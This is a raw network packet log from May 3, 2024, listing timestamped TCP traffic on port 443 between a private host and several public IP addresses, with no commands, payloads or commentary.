May 3, 2024 02:07:06.525329113 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.525830984 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.525851965 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.526747942 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.526994944 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.527107000 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.529721022 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.529788017 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.530241966 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.530260086 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.530808926 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.530817032 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.531454086 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.531570911 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.532859087 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.532927990 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.533185005 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.533191919 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.621217012 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.628438950 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.628449917 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.629673004 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.629779100 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.630414009 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.630502939 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.631087065 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.631092072 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.638099909 CEST	443	49711	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.638644934 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.651663065 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.651674032 CEST	443	49711	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.652930021 CEST	443	49711	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.653132915 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.654755116 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.654831886 CEST	443	49711	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.655111074 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.655117989 CEST	443	49711	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.730417967 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.730451107 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.730506897 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.730508089 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.730534077 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.730561972 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.733625889 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.733731985 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.733741045 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.735491037 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.737953901 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.756263018 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.762388945 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.934648991 CEST	443	49711	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.934777975 CEST	443	49711	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.937971115 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.945691109 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.945810080 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.945960045 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:07.152070045 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:07.152251959 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:07.157968998 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:07.546363115 CEST	49674	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:07.561976910 CEST	49675	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:07.561995029 CEST	49673	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:08.025373936 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.025410891 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.291913986 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.291935921 CEST	443	49711	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.292682886 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.292712927 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.300398111 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.300412893 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.302597046 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.302627087 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.302684069 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.303977013 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.303989887 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.490520954 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.497961998 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.497982025 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.498342037 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.501749039 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.501813889 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.505233049 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.505268097 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.505325079 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.505400896 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.505594015 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.505609035 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.552134037 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.678817987 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.678874969 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.678911924 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.678925037 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.678936005 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.678967953 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.678978920 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.679049015 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.679088116 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.687314987 CEST	49714	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.687336922 CEST	443	49714	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.693304062 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.693857908 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.693873882 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.694688082 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.696721077 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.696821928 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.697191000 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.744112015 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.880789042 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.880826950 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.880863905 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.880875111 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.880897045 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.880937099 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.880943060 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.880953074 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:08.881000996 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.881578922 CEST	443	49703	23.1.237.91	192.168.2.5
May 3, 2024 02:07:08.881664991 CEST	49703	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:08.881973982 CEST	49715	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:08.881983995 CEST	443	49715	142.250.176.196	192.168.2.5
May 3, 2024 02:07:10.088169098 CEST	49717	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:10.088219881 CEST	443	49717	142.250.176.196	192.168.2.5
May 3, 2024 02:07:10.088313103 CEST	49717	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:10.088588953 CEST	49717	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:10.088603973 CEST	443	49717	142.250.176.196	192.168.2.5
May 3, 2024 02:07:10.274580956 CEST	443	49717	142.250.176.196	192.168.2.5
May 3, 2024 02:07:10.275067091 CEST	49717	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:10.275084019 CEST	443	49717	142.250.176.196	192.168.2.5
May 3, 2024 02:07:10.275438070 CEST	443	49717	142.250.176.196	192.168.2.5
May 3, 2024 02:07:10.275998116 CEST	49717	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:10.276057005 CEST	443	49717	142.250.176.196	192.168.2.5
May 3, 2024 02:07:10.338351011 CEST	49717	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:12.923959017 CEST	49719	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:12.923995018 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:12.924081087 CEST	49719	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:12.926155090 CEST	49719	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:12.926168919 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.110338926 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.110486031 CEST	49719	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.114029884 CEST	49719	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.114043951 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.114253044 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.160542011 CEST	49719	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.208127022 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.283871889 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.284041882 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.284086943 CEST	49719	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.284235954 CEST	49719	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.284257889 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.284267902 CEST	49719	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.284275055 CEST	443	49719	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.336294889 CEST	49720	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.336323023 CEST	443	49720	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.336389065 CEST	49720	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.336716890 CEST	49720	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.336731911 CEST	443	49720	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.515496016 CEST	443	49720	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.515574932 CEST	49720	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.528682947 CEST	49720	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.528693914 CEST	443	49720	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.528899908 CEST	443	49720	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.530366898 CEST	49720	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.576108932 CEST	443	49720	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.692975044 CEST	443	49720	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.729967117 CEST	443	49720	23.199.50.2	192.168.2.5
May 3, 2024 02:07:13.730134964 CEST	49720	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.730135918 CEST	49720	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.730154037 CEST	49720	443	192.168.2.5	23.199.50.2
May 3, 2024 02:07:13.730161905 CEST	443	49720	23.199.50.2	192.168.2.5
May 3, 2024 02:07:18.753298044 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:18.753341913 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:18.753441095 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:18.754890919 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:18.754909039 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.249039888 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.249119997 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.253251076 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.253263950 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.253467083 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.356049061 CEST	49703	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.360408068 CEST	49703	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.370887995 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.370915890 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:19.371088982 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.389338017 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.389365911 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:19.448024988 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.510307074 CEST	443	49703	23.1.237.91	192.168.2.5
May 3, 2024 02:07:19.514472961 CEST	443	49703	23.1.237.91	192.168.2.5
May 3, 2024 02:07:19.606640100 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.652110100 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.706413031 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:19.706479073 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.791208029 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.791238070 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:19.791572094 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:19.791672945 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.820328951 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.820379019 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:19.824242115 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:19.824263096 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:19.928843975 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.928870916 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.928879023 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.928905010 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.928924084 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.928922892 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.928931952 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.928950071 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.928982019 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.929003954 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.929310083 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.929316998 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.929335117 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.929362059 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.929378033 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.929378986 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.929461002 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.947133064 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.947149038 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:19.947264910 CEST	49721	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:19.947272062 CEST	443	49721	20.114.59.183	192.168.2.5
May 3, 2024 02:07:20.126050949 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:20.126116991 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:20.126801014 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:20.126868010 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:20.126921892 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:20.164174080 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:20.164195061 CEST	443	49724	23.1.237.91	192.168.2.5
May 3, 2024 02:07:20.164236069 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:20.164267063 CEST	49724	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:20.273973942 CEST	443	49717	142.250.176.196	192.168.2.5
May 3, 2024 02:07:20.274046898 CEST	443	49717	142.250.176.196	192.168.2.5
May 3, 2024 02:07:20.274257898 CEST	49717	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:21.485124111 CEST	49717	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:21.485147953 CEST	443	49717	142.250.176.196	192.168.2.5
May 3, 2024 02:07:57.726387978 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:57.726418018 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:57.726495028 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:57.726972103 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:57.726984024 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.219196081 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.219304085 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.224416018 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.224427938 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.224680901 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.234875917 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.280117989 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.700608015 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.700634956 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.700650930 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.700726986 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.700757027 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.700773001 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.700803995 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.700807095 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.700823069 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.700834990 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.700850010 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.700872898 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.700917006 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.706192970 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.706211090 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:07:58.706234932 CEST	49727	443	192.168.2.5	20.114.59.183
May 3, 2024 02:07:58.706240892 CEST	443	49727	20.114.59.183	192.168.2.5
May 3, 2024 02:08:10.137526035 CEST	49729	443	192.168.2.5	142.250.176.196
May 3, 2024 02:08:10.137571096 CEST	443	49729	142.250.176.196	192.168.2.5
May 3, 2024 02:08:10.137681961 CEST	49729	443	192.168.2.5	142.250.176.196
May 3, 2024 02:08:10.138032913 CEST	49729	443	192.168.2.5	142.250.176.196
May 3, 2024 02:08:10.138046026 CEST	443	49729	142.250.176.196	192.168.2.5
May 3, 2024 02:08:10.325591087 CEST	443	49729	142.250.176.196	192.168.2.5
May 3, 2024 02:08:10.325980902 CEST	49729	443	192.168.2.5	142.250.176.196
May 3, 2024 02:08:10.326006889 CEST	443	49729	142.250.176.196	192.168.2.5
May 3, 2024 02:08:10.326340914 CEST	443	49729	142.250.176.196	192.168.2.5
May 3, 2024 02:08:10.326694965 CEST	49729	443	192.168.2.5	142.250.176.196
May 3, 2024 02:08:10.326746941 CEST	443	49729	142.250.176.196	192.168.2.5
May 3, 2024 02:08:10.367794991 CEST	49729	443	192.168.2.5	142.250.176.196
May 3, 2024 02:08:20.330261946 CEST	443	49729	142.250.176.196	192.168.2.5
May 3, 2024 02:08:20.330348015 CEST	443	49729	142.250.176.196	192.168.2.5
May 3, 2024 02:08:20.330403090 CEST	49729	443	192.168.2.5	142.250.176.196
May 3, 2024 02:08:21.480935097 CEST	49729	443	192.168.2.5	142.250.176.196
May 3, 2024 02:08:21.480959892 CEST	443	49729	142.250.176.196	192.168.2.5
May 3, 2024 02:08:23.128206015 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.128233910 CEST	443	49732	168.119.248.46	192.168.2.5
May 3, 2024 02:08:23.128329039 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.136728048 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.136743069 CEST	443	49732	168.119.248.46	192.168.2.5
May 3, 2024 02:08:23.502162933 CEST	443	49732	168.119.248.46	192.168.2.5
May 3, 2024 02:08:23.502234936 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.562824011 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.562855005 CEST	443	49732	168.119.248.46	192.168.2.5
May 3, 2024 02:08:23.563213110 CEST	443	49732	168.119.248.46	192.168.2.5
May 3, 2024 02:08:23.563273907 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.565138102 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.612126112 CEST	443	49732	168.119.248.46	192.168.2.5
May 3, 2024 02:08:23.989078999 CEST	443	49732	168.119.248.46	192.168.2.5
May 3, 2024 02:08:23.989152908 CEST	443	49732	168.119.248.46	192.168.2.5
May 3, 2024 02:08:23.989159107 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.989192963 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.989382029 CEST	49732	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:23.989399910 CEST	443	49732	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.003026962 CEST	49733	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.003053904 CEST	443	49733	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.003128052 CEST	49733	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.003366947 CEST	49733	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.003379107 CEST	443	49733	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.362488985 CEST	443	49733	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.362653017 CEST	49733	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.363872051 CEST	49733	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.363879919 CEST	443	49733	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.364108086 CEST	49733	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.364111900 CEST	443	49733	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.823050022 CEST	443	49733	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.823076963 CEST	443	49733	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.823142052 CEST	443	49733	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.823189020 CEST	49733	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.823213100 CEST	49733	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.823476076 CEST	49733	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.823488951 CEST	443	49733	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.824928999 CEST	49734	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.824965000 CEST	443	49734	168.119.248.46	192.168.2.5
May 3, 2024 02:08:24.825046062 CEST	49734	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.825273991 CEST	49734	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:24.825289965 CEST	443	49734	168.119.248.46	192.168.2.5
May 3, 2024 02:08:25.183928967 CEST	443	49734	168.119.248.46	192.168.2.5
May 3, 2024 02:08:25.184047937 CEST	49734	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:25.184490919 CEST	49734	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:25.184499979 CEST	443	49734	168.119.248.46	192.168.2.5
May 3, 2024 02:08:25.184716940 CEST	49734	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:25.184721947 CEST	443	49734	168.119.248.46	192.168.2.5
May 3, 2024 02:08:25.644835949 CEST	443	49734	168.119.248.46	192.168.2.5
May 3, 2024 02:08:25.644860983 CEST	443	49734	168.119.248.46	192.168.2.5
May 3, 2024 02:08:25.644926071 CEST	443	49734	168.119.248.46	192.168.2.5
May 3, 2024 02:08:25.644951105 CEST	49734	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:25.644996881 CEST	49734	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:25.645436049 CEST	49734	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:25.645447969 CEST	443	49734	168.119.248.46	192.168.2.5
May 3, 2024 02:08:25.675165892 CEST	49735	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:25.675189972 CEST	443	49735	168.119.248.46	192.168.2.5
May 3, 2024 02:08:25.675276041 CEST	49735	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:25.675544977 CEST	49735	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:25.675554991 CEST	443	49735	168.119.248.46	192.168.2.5
May 3, 2024 02:08:26.031552076 CEST	443	49735	168.119.248.46	192.168.2.5
May 3, 2024 02:08:26.031625986 CEST	49735	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:26.032212973 CEST	49735	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:26.032219887 CEST	443	49735	168.119.248.46	192.168.2.5
May 3, 2024 02:08:26.032406092 CEST	49735	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:26.032413006 CEST	443	49735	168.119.248.46	192.168.2.5
